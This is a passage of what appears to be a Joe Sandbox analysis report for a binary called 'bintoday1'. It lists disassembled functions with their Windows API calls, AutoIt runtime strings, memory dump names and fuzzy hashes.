Instruction Fuzzy Hash: 19319872211224BFEB218F50DC8AFEF3BA9EF09711F044065FE089A691C6759C51CBA4

Function 00BF5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00BF5637
_memcmp.LIBVCRUNTIME ref: 00BF5659
_memcmp.LIBVCRUNTIME ref: 00BF5671
_memcmp.LIBVCRUNTIME ref: 00BF5684
_memcmp.LIBVCRUNTIME ref: 00BF569E
_memcmp.LIBVCRUNTIME ref: 00BF56B1
_memcmp.LIBVCRUNTIME ref: 00BF56C9
_memcmp.LIBVCRUNTIME ref: 00BF56E4

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a91bee3187691954f064cef97df32b82703288373873bb00501c3fbf358efe04
Instruction ID: 09a03ddda14a7814ad6419c0b42b467773f9f4b482443481a2157148547f4177
Opcode Fuzzy Hash: a91bee3187691954f064cef97df32b82703288373873bb00501c3fbf358efe04
Instruction Fuzzy Hash: DC21C561644A1D77D6346A249D92FFA23DCEF20384F8400B4FF15DBA81F760ED1982A9

Function 00C14FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00C1502E, 00C15383
Not an Object type, xrefs: 00C15007

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: abc5b474909a980107fc8de186ecca83d6c4d704bbfb25a0c239f4285d599f42
Instruction ID: f338cce49b65cba6a7dfcfa18d376d64cca2f56728909a0b05cc4887e7044731
Opcode Fuzzy Hash: abc5b474909a980107fc8de186ecca83d6c4d704bbfb25a0c239f4285d599f42
Instruction Fuzzy Hash: 14D1B475A0060AEFDF10CF98C880BEEB7B5BF89344F148069E925AB291D770DE85DB50

Function 00BD1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00BD17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00BD15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BD17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BD1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00BD17FB,?,00BD17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BD16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BD17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BD16FB

Part of subcall function 00BC3820: RtlAllocateHeap.NTDLL(00000000,?,00C61444,?,00BAFDF5,?,?,00B9A976,00000010,00C61440,00B913FC,?,00B913C6,?,00B91129), ref: 00BC3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00BD17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BD1777
__freea.LIBCMT ref: 00BD17A2
__freea.LIBCMT ref: 00BD17AE

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: c00d74c7cc8ea0b823a7d49a357afc2b82e7a4541e22bbc7fbd4702813fd21a5
Instruction ID: 3b488c6dca4f4a94f8cd488146499194aa6a234ca36f2f6c48eaec7b37ffb1c5
Opcode Fuzzy Hash: c00d74c7cc8ea0b823a7d49a357afc2b82e7a4541e22bbc7fbd4702813fd21a5
Instruction Fuzzy Hash: DC91B371E00216BADB208E68D881AEEFBF5EF59714F184A9AE805E7351F739DD40C760

Function 00C14523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C14648
VariantInit.OLEAUT32(?), ref: 00C14749
VariantClear.OLEAUT32(?), ref: 00C14753
VariantClear.OLEAUT32(?), ref: 00C147B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00C145D8, 00C14706, 00C147BE
Incorrect Object type in FOR..IN loop, xrefs: 00C1472C

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: b3e140330f4bdf6247dfb717e059956bf24d832f86b6c26545285a394c5301be
Instruction ID: 4022fa66962fd2d06c797abe4d9813345a5fd947a6c16574a883eb784fca6b84
Opcode Fuzzy Hash: b3e140330f4bdf6247dfb717e059956bf24d832f86b6c26545285a394c5301be
Instruction Fuzzy Hash: 8F91A271A00215AFDF24CFA5C844FEEBBB8EF46714F108559F515AB280D7709985DFA0

Function 00C01187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C0125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C01284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C012A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C012D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C0135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C013C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C01430

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 5c60e15f20e19fa6e9c646dcdfdfd442ef90ffbdcc2b1828ca566c9e1a5bda89
Instruction ID: 6881d29b594d2fe47b4fc046d6b16cf90e08594eace224b17490371d12fca434
Opcode Fuzzy Hash: 5c60e15f20e19fa6e9c646dcdfdfd442ef90ffbdcc2b1828ca566c9e1a5bda89
Instruction Fuzzy Hash: B191CE71A00219AFEB00DFA4C884BBEB7F5FF45724F294069E951EB2E1D774A941CB90

Function 00BA948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: dfa3c618c25b3bcf4eecc6337ee7026ea79145ed51025fb72e23439358b74d3f
Instruction ID: a08f7290d3590082616abde7ac733ba9cd7e7a83639b3c1d921a4701ad7e5080
Opcode Fuzzy Hash: dfa3c618c25b3bcf4eecc6337ee7026ea79145ed51025fb72e23439358b74d3f
Instruction Fuzzy Hash: C7914471D44219EFCB14CFA9C885AEEBBF8FF4A320F148089E515B7251D734AA42DB60

Function 00C13947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C1396B
CharUpperBuffW.USER32(?,?), ref: 00C13A7A
_wcslen.LIBCMT ref: 00C13A8A
VariantClear.OLEAUT32(?), ref: 00C13C1F

Part of subcall function 00C00CDF: VariantInit.OLEAUT32(00000000), ref: 00C00D1F
Part of subcall function 00C00CDF: VariantCopy.OLEAUT32(?,?), ref: 00C00D28
Part of subcall function 00C00CDF: VariantClear.OLEAUT32(?), ref: 00C00D34

Strings

AUTOIT.ERROR, xrefs: 00C13A80, 00C13A85
Incorrect Parameter format, xrefs: 00C139A6, 00C13BA1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 1803a5a9a8528bb93f31d33569f19aacfbe67b76dce8c663ff4aec9a219c1bf9
Instruction ID: aeb212077f384805778174ab6e1848df173822ae85a2cb599ca018832493b632
Opcode Fuzzy Hash: 1803a5a9a8528bb93f31d33569f19aacfbe67b76dce8c663ff4aec9a219c1bf9
Instruction Fuzzy Hash: 57918E746083459FCB04DF64C4909AAB7E4FF89318F14896DF89997351DB30EE45DB82

Function 00C14BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00BF000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BEFF41,80070057,?,?,?,00BF035E), ref: 00BF002B
Part of subcall function 00BF000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BEFF41,80070057,?,?), ref: 00BF0046
Part of subcall function 00BF000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BEFF41,80070057,?,?), ref: 00BF0054
Part of subcall function 00BF000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BEFF41,80070057,?), ref: 00BF0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C14C51
_wcslen.LIBCMT ref: 00C14D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C14DCF
CoTaskMemFree.OLE32(?), ref: 00C14DDA

Strings

NULL Pointer assignment, xrefs: 00C14E23, 00C14E52

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 41612fba3be0a14d159a5fabf8c0dcbe49ecaf26fab93d6a4e226d678cabada2
Instruction ID: a9f339ca26310278a0d6c2a662fb1810ebcbca56a762c3a0f592832efd5bcf08
Opcode Fuzzy Hash: 41612fba3be0a14d159a5fabf8c0dcbe49ecaf26fab93d6a4e226d678cabada2
Instruction Fuzzy Hash: F5912A71D0021DEFDF14DFA4D891AEEB7B9BF09310F108169E915A7291DB309A85DFA0

Function 00C220FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00C22183
GetMenuItemCount.USER32(00000000), ref: 00C221B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C221DD
_wcslen.LIBCMT ref: 00C22213
GetMenuItemID.USER32(?,?), ref: 00C2224D
GetSubMenu.USER32(?,?), ref: 00C2225B

Part of subcall function 00BF3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BF3A57
Part of subcall function 00BF3A3D: GetCurrentThreadId.KERNEL32 ref: 00BF3A5E
Part of subcall function 00BF3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00BF25B3), ref: 00BF3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C222E3

Part of subcall function 00BFE97B: Sleep.KERNEL32 ref: 00BFE9F3

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 254e1bc613d6f653b21a6d53798250d5bc4bc31ba4b2c9a8b9e42dbaf06e7269
Instruction ID: ab3aeb6b89534e05eef7ebadfe13fa8b903c9e375212fde4279075e146622ffb
Opcode Fuzzy Hash: 254e1bc613d6f653b21a6d53798250d5bc4bc31ba4b2c9a8b9e42dbaf06e7269
Instruction Fuzzy Hash: 7271B235A00215EFCB10DFA5D881AAEB7F1EF48320F1184A9E826EB751D735EE418B90

Function 00C27E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00FB4D90), ref: 00C27F37
IsWindowEnabled.USER32(00FB4D90), ref: 00C27F43
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C2801E
SendMessageW.USER32(00FB4D90,000000B0,?,?), ref: 00C28051
IsDlgButtonChecked.USER32(?,?), ref: 00C28089
GetWindowLongW.USER32(00FB4D90,000000EC), ref: 00C280AB
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C280C3

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 990bb1e51c8eff99a48e3fb08bf9009741a1fef783ac37db37476041fe92c352
Instruction ID: a13ce990df17ed75d597d6ba105af579aa40c8de2636d4750dce1b512c69852b
Opcode Fuzzy Hash: 990bb1e51c8eff99a48e3fb08bf9009741a1fef783ac37db37476041fe92c352
Instruction Fuzzy Hash: 4571B03460D224AFEB30DF94E9C4FAE7BB5EF09300F140159F96593AA1CB31AA45DB20

Function 00BFAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00BFAEF9
GetKeyboardState.USER32(?), ref: 00BFAF0E
SetKeyboardState.USER32(?), ref: 00BFAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 00BFAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 00BFAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 00BFAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BFB020

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 2c1a6291f3f9f1981ae851a2f368923babb506f41861bb39b51c8694ca5f9f2d
Instruction ID: f41b7f06abb17b4f6180c04aa6bf2c3f66252e40758d8030aa1e75495a216f38
Opcode Fuzzy Hash: 2c1a6291f3f9f1981ae851a2f368923babb506f41861bb39b51c8694ca5f9f2d
Instruction Fuzzy Hash: 7651B4E06147D93DFB364234CC45BBA7EE99B06304F0885C9E2D99A8C2C798A8CCD751

Function 00BFACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00BFAD19
GetKeyboardState.USER32(?), ref: 00BFAD2E
SetKeyboardState.USER32(?), ref: 00BFAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BFADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BFADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BFAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BFAE38

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7a638c63a224676e7ac167f52e69f67fe648db8449e2e4b59fe4101841a3f1b0
Instruction ID: 4ba0b17b3fdadadb91cfe0a3b9c31a9ffd0313cff35889563e57abc673693f30
Opcode Fuzzy Hash: 7a638c63a224676e7ac167f52e69f67fe648db8449e2e4b59fe4101841a3f1b0
Instruction Fuzzy Hash: 0551D3E15047D93DFB3A8224CC85B7ABEE9AB46300F0884D8E2D9578C2C294EC8CD752

Function 00BC542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00BD3CD6,?,?,?,?,?,?,?,?,00BC5BA3,?,?,00BD3CD6,?,?), ref: 00BC5470
__fassign.LIBCMT ref: 00BC54EB
__fassign.LIBCMT ref: 00BC5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00BD3CD6,00000005,00000000,00000000), ref: 00BC552C
WriteFile.KERNEL32(?,00BD3CD6,00000000,00BC5BA3,00000000,?,?,?,?,?,?,?,?,?,00BC5BA3,?), ref: 00BC554B
WriteFile.KERNEL32(?,?,00000001,00BC5BA3,00000000,?,?,?,?,?,?,?,?,?,00BC5BA3,?), ref: 00BC5584

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4358f30a991ac3c346f084c258e32c1dfd51e08c7314a36bbade3732888772c5
Instruction ID: 41fab33328469cb149b5552aaed6ff30d1b56c7d140b15be42aff347304f49b4
Opcode Fuzzy Hash: 4358f30a991ac3c346f084c258e32c1dfd51e08c7314a36bbade3732888772c5
Instruction Fuzzy Hash: 0351B571A006099FDB20CFA8D885FEEBBF5EF18300F14455EE555E7291D670AA81CB60

Function 00BB2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00BB2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00BB2D53
_ValidateLocalCookies.LIBCMT ref: 00BB2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00BB2E0C
_ValidateLocalCookies.LIBCMT ref: 00BB2E61

Strings

csm, xrefs: 00BB2DF6

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3dc68b1c62fff48ed33d1c6ba48bbe7b425a4fe7b4ed42b0ef20de3ae9efd847
Instruction ID: adbfe197067139e97f84f742061b23f7b99f05d7f31d671f90f12f124ed34c8e
Opcode Fuzzy Hash: 3dc68b1c62fff48ed33d1c6ba48bbe7b425a4fe7b4ed42b0ef20de3ae9efd847
Instruction Fuzzy Hash: EE419334A00209ABCF10DF68CC85AEEBBF5FF45324F1481A5E8156B392D7B1EA55CB91

Function 00C110B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C1307A
Part of subcall function 00C1304E: _wcslen.LIBCMT ref: 00C1309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C11112
WSAGetLastError.WSOCK32 ref: 00C11121
WSAGetLastError.WSOCK32 ref: 00C111C9
closesocket.WSOCK32(00000000), ref: 00C111F9

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 34e71193165c04f9636a74cd9e124e94b787e4ff2f65f84d8adc9f2aaebc5a0c
Instruction ID: fe0f0f6c7bebd645e5c8497a2d436564b701d3fb5c700b76a5b4497ce032bc87
Opcode Fuzzy Hash: 34e71193165c04f9636a74cd9e124e94b787e4ff2f65f84d8adc9f2aaebc5a0c
Instruction Fuzzy Hash: 7341D631600204AFDB109F14C884BEDBBE9EF46324F288059FE199B291D774EE85DBE1

Function 00BFCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BFCF22,?), ref: 00BFDDFD

Part of subcall function 00BFDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BFCF22,?), ref: 00BFDE16

lstrcmpiW.KERNEL32(?,?), ref: 00BFCF45
MoveFileW.KERNEL32(?,?), ref: 00BFCF7F
_wcslen.LIBCMT ref: 00BFD005
_wcslen.LIBCMT ref: 00BFD01B
SHFileOperationW.SHELL32(?), ref: 00BFD061

Strings

\*.*, xrefs: 00BFCFF3

Memory Dump Source

